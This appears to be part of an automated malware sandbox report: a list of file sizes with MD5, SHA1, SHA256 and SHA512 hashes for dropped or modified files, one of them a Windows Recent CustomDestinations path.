  SHA1: 4fcb4447de0dd4d660b97e4067950450857d01d1
  SHA256: 55a5a5a6c43d194fc7eba48124f339691309a88a2e311591c3574f2ed8f1fd2a
  SHA512: 28d86d114a02a602142e8e7e3bcedb5b0509e881ae27c165027e733f7e8265dd8d798f29eb28483666b3f04a0170735b2a5222ef5277e9480a7a7a03fb27a4c7

- Filesize: 7KB
  MD5: 8d987a66236b1e7c2726de43210639f7
  SHA1: d18895a5d76d05bf31ded84573e923ae9d0a56f2
  SHA256: bd34d8a1546ed12661c36206e7ee00c24d46ea5a48b82c4419a2afd79fd21488
  SHA512: b21fa1593402f77dbfab59ac2e1c0171fa6af5c8c54b9bd503acabab1b196a91d97d9786732d4f89b11e5585bdeb80cecdfcc36c513f9d29fff3e7abd6474d83

- Filesize: 6KB
  MD5: b58f77c3c863078183a756ca28aa8547
  SHA1: a44efdfe52a8feaed5887f44b6f18ed38dc1dbea
  SHA256: 097df1f303ca5e5808bdcb3f3a5387f78853c20b7d3df6119ff60c2d2f911b47
  SHA512: f90a94c0df47c754bcffff84bbb4c578cb97f6b1d24b3d7fab13d103ba0ef7fe7d8ad2de2e28eef18c15093f5f7d26ac2903411c26b4898d1236f753f880d8d7

- Filesize: 7KB
  MD5: 07dc383aede50b025c2d4cc779f85f12
  SHA1: b358e562cef08a95539e817f4a120837fa16754c
  SHA256: 4b3201b287a49f20b6625d2972a860b9f7faf59e5a4e7dc9f0349056b4d0e467
  SHA512: 3954af308084c99ffb59b0db1be4f28ef2a3cbb708d3d3a945f6d6e31fb955d2dd5ff2932bfe8b8182f8a8b02ae408860175229ddb8b9adc3c8aa0a876ee98e7

- Filesize: 7KB
  MD5: 7d5f0356c627766451433ac4c3b55c42
  SHA1: ae70cab30f3d5af80c1c6a177df6819a52b86d6f
  SHA256: f02b2790c8c9b3015194410ab3a22f7199bd8284d7ac3804e5e8b49c08e07690
  SHA512: aa21faf88136bfbc6b41cd56e218d9e1ff76517db9a7b14f2c7f70a140f609385d5fd9e98ed545189c0278b881f019e88aa455a21e11db027c6f1a1be8a627de

- Filesize: 7KB
  MD5: 922e2a14e3e177e4464f279338b8f0f5
  SHA1: 65cdafa97afd20c4e39e21a477094d3f8e9eace7
  SHA256: 0fe4d103fa2e61d08eece6a2f7fbc017bc9a0744ddd5ffbd19e87ac4b6641313
  SHA512: ede8adc7756fed826d432f69eb41dadd07208f1e4822a2ccb83efbc4861173008c93641dcd7da0fc1b992df5b81534e8fc38816e9745de4dd7e7aa125a07135c

- Filesize: 7KB
  MD5: 4404c910f252218dfa54f477ed63c90f
  SHA1: 81a77d004a877c08c1bd12357d5e7eb1df534102
  SHA256: ed25e8b06680fa537a11dfe688cd0e307362acdfa2604adbb6dc5f51893f664c
  SHA512: 657c276de74cda2a4ba5fe6e79368d8a5ff3025980449535e7d7413db242708c22d2dcaef9646e72f1dd778ff16a67a0fe8e9a351654b48872a2cf03445ceb69

- Filesize: 6KB
  MD5: f6a250d0c4a2a2dd813080d9926de3de
  SHA1: 5a393d07eb5c92fd5000054a2ab1b8c249d67282
  SHA256: 22b21bc59e71361f20b0fccb2b2b54bc9b08af1e78604294f3494ba4b128c49d
  SHA512: 09eb2d3a74ebc42e8ba3eea588bbd6678f6de91c62cf5bb169b38e3916452a582f371d8b05b83a5f2451a9df63e061865d86bb540feffa95735e0d47d9075888

- Filesize: 703B
  MD5: 563ad29c3125a60e50cd0bd91ac2ee01
  SHA1: ab5d467ba7cb0cb9d4a24d2c70ffaa98018567cd
  SHA256: a19c78b66c9937798ecacc2a8a9aaf26e2e2d3acd6699efebe0b4000cacc8567
  SHA512: d041b015568e9d0619bc1dc4c24a9cb2287a367563b74f01e4be2beb090ed65eeb3b072c119124e3957ebde74777462b0fde4dc22a8cf826093b1da923f91f1d

- Filesize: 870B
  MD5: 81bd2438dcee693bd38ba1abe3209572
  SHA1: 9e2a32b82787e6377e54f6666817648ff0b99069
  SHA256: 22567b773455b55ad5f5ab01e605650204356848b0572412f968394af79e980d
  SHA512: 843d6888178b409573248ce0575698c17e0cd11389ee07968745ff3e3919b132522e3cc856b29f72106a4b7d56752ac9a976e0f9271b05016733da8f4ac113a3

- Filesize: 870B
  MD5: cee24d74be11ee465c3cc99517ed789e
  SHA1: 6212c2db9e9737bcddad6b3ce4a793ef80f78d39
  SHA256: 6710371b0601bce8f27f23fda0a1b0c23baa3745fc138b44ad9a75490543c3b2
  SHA512: 99b71f9ce508c20881ccc0d7029777408173e9b45f197c67b0ee5b0c837113eaabad35dfc63e18c37246389cc4ecd4474c19832c7838ac889677d61b48505c44

- Filesize: 870B
  MD5: d7ea3108442f976b70a77ecd5f5993cc
  SHA1: c6e85d7ac1b1a5c4a1af9fac2c3672b1b73d53d1
  SHA256: f47ddd9d2f98421bd16cea9613a7721580a6029a5dda482a8dc9834a8f7b4110
  SHA512: 9f82b25ed60ecbe7c12c6a3c06e9adab1b83db4a1c5fecf69fc31380c66dcd3baa85869cd7ce67b96293bccdf151d230754982ae0879150c8a88ae38ec6e12fa

- Filesize: 703B
  MD5: b6ec01cfc9a86d5f8dbc12fc3d6db5f9
  SHA1: e4970b12bf2aeff9a18f51499b8e23ef1c0d50a3
  SHA256: 7a57ad964712ca22596da1315d40f30c729698d92124f75d72715701e32d49d5
  SHA512: 3323448a16da714eac972a47384a2aa6cdc02689d20f8b57c3405a28c0656405f39e07fe4a7c23ed1dc625a7eaed2045a960ebbe9ac4047706e4d92c724e6819

- Filesize: 870B
  MD5: dab0305e0304d875ae46e90345260bfe
  SHA1: ca8dc44fdb425377540044fc1121afb3e793fd35
  SHA256: 12cf189bce50d8ffce3b36753c4b4e91555b0a9ebcb3d4b4a01482ca66daf91a
  SHA512: fb8db267ff60d54e6284d2a9ecab4610b31c6a9612998833c0b6a994aee9457010553161002051d1ab7741baf5d57c506ca07b5d31331ef13cf9623317979cdb

- Filesize: 870B
  MD5: e0381e64c45d0f10620520ee43f8a5e6
  SHA1: 272b3b752f29d191ee42d68ccc628caa2a25611b
  SHA256: dcc739bcf5655631da20f6a1472bdad1839dcdb6d92b99a7d3e05a09d5e108d0
  SHA512: 9ebd93e1bccda9995e9296850263c4aa3cc005635caff5de3612bf484cdc268fa7caba60c443970dd31c94f7cd965dedc13731f01830704878be5773b1c47bac
- Filesize: 870B
  MD5: c847614503264e576b91727d6a20b8d6
  SHA1: 164c29d36bf48da0ddcebd514e65b8994f2cf404
  SHA256: 48c3a43d97469b69bf6ef0b7d22c831bf4b33cb815e3580d72c773629308ab1a
  SHA512: f9ec9513e4503de5cab0f1820edb078aa0401d229d95dc68b9bd02c7c31d226d5c0a50cab0366f5061fc3ec434b20fb39210637f4ece85a40443c9619b3eb3e4

- Filesize: 872B
  MD5: 055c212b2502918ac3e38a5a5a5e6c97
  SHA1: 62f553413bcec251f7729d0c5daf9c9b457da259
  SHA256: 956e4e3d3ef8d7009474fe6cc7774302035cef9e338cf9364ea053fd703b822e
  SHA512: ab65e5ea7a2fedde15d2b54c104ba969b60cde9251f3195dac77cc838957e0b3406e6ca491d945a5917fb714bef97fd790a1b261d3ca80324359e2d6fa248a7e

- Filesize: 870B
  MD5: 6348a81d572fe23a7de6a161187bb59e
  SHA1: 812fe3f4dd3f7f899baa1eb36a553beb3190d486
  SHA256: cbb1744130f8fcbef4365d4c9d87c2a86694396089053fc6c7448626be8237df
  SHA512: 07440a49da56926b8b360355bb9bfaa64d3352eee7f0815d78128ab974413d954deb57197cb5a9eaeb30f231701d54f291173eb8868eae5233c2d2da3c165dc8

- Filesize: 872B
  MD5: a7cc5df9fde68a1866e0a10ff7187dc1
  SHA1: 78e39607915a8c75d076d06026ef0afa1bccaea3
  SHA256: 96d050ed69c484bdc4555fe0c3880e0bfe1b5aafbadad8899376ffa52371fa6d
  SHA512: 5e31796b2e6c4cd30439175e3aeb335e2e329eab5cdbd477a8ce40f79e45cffa4d421edcc7c44a1213f437022243cbd451a2b0f9a7eddc86067742a9db2f50fe

- Filesize: 872B
  MD5: 9802995d4d5fa55a749c275734d90c5a
  SHA1: 1e6beb1004007cf68eef9f13e21e6ebdaa7b1a55
  SHA256: adf30421375923845810083d507ac7a595e53ea45d0882d3b58df5f6ae4f0ccc
  SHA512: c719ae6a43f2c72ff5e1ace757773cbbba23be539508b766c1c5e7d9ba2aca926d11ad953441966c6870efbc8cff80f096fbd65f0dbfe5769da3a1a519a5f8d1

- Filesize: 538B
  MD5: 4f6f9758d793bdfc0666d84fe5c466e8
  SHA1: 971aa71333db83d5cdc7f627e45a36ca8099057e
  SHA256: 616906633226dc923ca5947aaec39634e69996ab00ff7d7e88498a7c525198c5
  SHA512: 6aa9f710f4e16208a41fb1e0f0e951d12e9478556d671474a2419ca1980ad4ac1662578933d91902931dc8682db2c5b47ac1edbf298914f5f8b6c2c2abfb3e91

- Filesize: 16B
  MD5: 6752a1d65b201c13b62ea44016eb221f
  SHA1: 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
  SHA256: 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
  SHA512: 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

- Filesize: 11KB
  MD5: 9323e75848937c73a2a36bb044d30b8f
  SHA1: 6913580ebb940cd0d5ca65f832425034f2b02c36
  SHA256: c8a3c6726b85a39a887b24604c41183285e3c2443fe0bda2ec85af612de3f81f
  SHA512: caffc6a6459c3d4f54238eef917483ffa12ad37b669f46f9390f4250ad28e175f1325c95b1ca4d221b9a2b77fa491a4443710a652fc66a72391c859824bd7b07

- Filesize: 12KB
  MD5: 245d9c4c0eebecf18ecc393c844c952d
  SHA1: 39ad2344ad2f558e4b5799f69c47180dca2e7e89
  SHA256: 605dce7f9b43145fc9aca2830f9a4d895f3f478632b160d8d6c179f760a82f3a
  SHA512: a677e86d0e49a017ebb9d9a1657d5535a87245bde448f0eccbf143738198feeb50b7b02c7853cd8aab35b90d5448c4fea8b2ef5ea57961d9619ae35d23b62355

- Filesize: 12KB
  MD5: c66045156ac40652e9b295ef2c9f3b1b
  SHA1: b5290bca64b13cd8f9fc006b2cad3759b1cb3898
  SHA256: 84c24eba8ba3fcdb00f50a93c0affe252a2479c79920ec197905e6ee15df88dc
  SHA512: 05a22fe05893d3fef490478ca67b8e7ff0afa06d097c395620498c7e01233e0f5c24ff8d1b61df928f2cd34f9cfd1c1de403c92755f1a6583ac5a92de3842fd1

- Filesize: 12KB
  MD5: 47b5fd67696f944edf7c847df3c5e43b
  SHA1: 9fa9ba700988b52b917c39d4cd2d73ec19b2ea70
  SHA256: ae28ed3aa0b4f1b911e4f33d8759540f3f976d56d736f4c4b012486c396858ba
  SHA512: f9c07e6e4c8b94eb886610a61cf02d16a90f65db0c95bc0e298c8b8f8f79d5110b42d67c4a7b2221d9d468671e9eeec021efd18fbc119c302c9f6a393a35df93

- Filesize: 12KB
  MD5: bc28d66a23e9d2b3a19fd4e0e85edab6
  SHA1: c11b26c8ad4fd46644ee3a1712e98d079533c946
  SHA256: e73b44a19a9d23d6c9e2c3cfb872357ecb8e4fff57abd7cf38b1275b38a93e36
  SHA512: a7b71eeffb369925789e1000e28b8c8b0b6dc37b1eec8db14b77fe91000406527104007cc84ea90f4ab1094d98c34e6b4760dd058fda291f38c0e0e1e0e1fd04

- Filesize: 11KB
  MD5: a40fc6ad6e92dfeb3e880f87cdfeb24e
  SHA1: 14c83d77d822d874cd16818df5f1aad06737bd44
  SHA256: 77f93b7daf321593f0da48bd4c58666c9e053ad299db1cd74be0d71e0afb26bc
  SHA512: 368b18c5e811f9816db42accd8d8232a9611961547a526341bb177629fb18031001856bd2523c91ad5df92fee287208ca512ee4a955e9833b2a655dfeccc5203

- Filesize: 64B
  MD5: 5caad758326454b5788ec35315c4c304
  SHA1: 3aef8dba8042662a7fcf97e51047dc636b4d4724
  SHA256: 83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
  SHA512: 4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
  Filesize: 10KB
  MD5: c87af6aa0ad523067992e191c311d735
  SHA1: 1b6eec3a73852cedfb7344a978975204170e9eda
  SHA256: 939dba13eef51075b469f11b90521bf5f61152bef7f0aea03089711a3cbf4e71
  SHA512: d046277ad5d8d8eb9094444367bc242b54e9623529b51ac546df1e16a759815cc58e388f603a0f716900236f27dbef44d25c59a248c51e849e17daf5e21a5d23

- Filesize: 1KB
  MD5: f71423d6f35fafd2810978dec16893a8
  SHA1: 3daed498678662222fc7ca3e8bec075702443d6d
  SHA256: e5a0e023c60dc90ac7893e3bb1c64e58787d860dfa82220b4e40c75720112c9d
  SHA512: e894796dca485bb6650d4b80e885f56c887b47511e35d73f687a9be29571bb306817b34d81df855baee1f7fd75f4b5f39fae9cf4b10e9bd1bde59cade9549171

- Filesize: 1KB
  MD5: 06f00f19552184405d35267ad9f50d37
  SHA1: 060cdaba818ce221ba92f621db1e8cb7946396fe
  SHA256: 7af59e0137d2363a206410413a5fad8f0385e20ec6c73680f565f4fc07429aaf
  SHA512: 1e751b977097b0b99a64a2876abd35e921f72d84aadcd66d5ad9d6c347b874746113f31ed39ae3d7a765b018f7cdfccfb6f33497d2668ff1a1156ac5808daf98

- Filesize: 54KB
  MD5: 4d12b09983f7a7b69c4597a39dd29df9
  SHA1: 8e0ec8c565e54ff1032ec448adcbec6b3da93e4b
  SHA256: 83e0a8e03eaf308b1fc095960ebd2a555e0aba2bb4f4a589f6351f2ce527960d
  SHA512: bf8520f8adc0703701f6a51d0a04cf3cd168727933ed16f4698a45bed240fe34c0bb0df187d15a844df5c0b020b019bd6811ccda4bbcae6856325c20e018972b
-
Filesize
3.7MB
MD53a2f16a044d8f6d2f9443dff6bd1c7d4
SHA148c6c0450af803b72a0caa7d5e3863c3f0240ef1
SHA25631f7ba37180f820313b2d32e76252344598409cb932109dd84a071cd58b64aa6
SHA51261daee2ce82c3b8e79f7598a79d72e337220ced7607e3ed878a3059ac03257542147dbd377e902cc95f04324e2fb7c5e07d1410f0a1815d5a05c5320e5715ef6
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e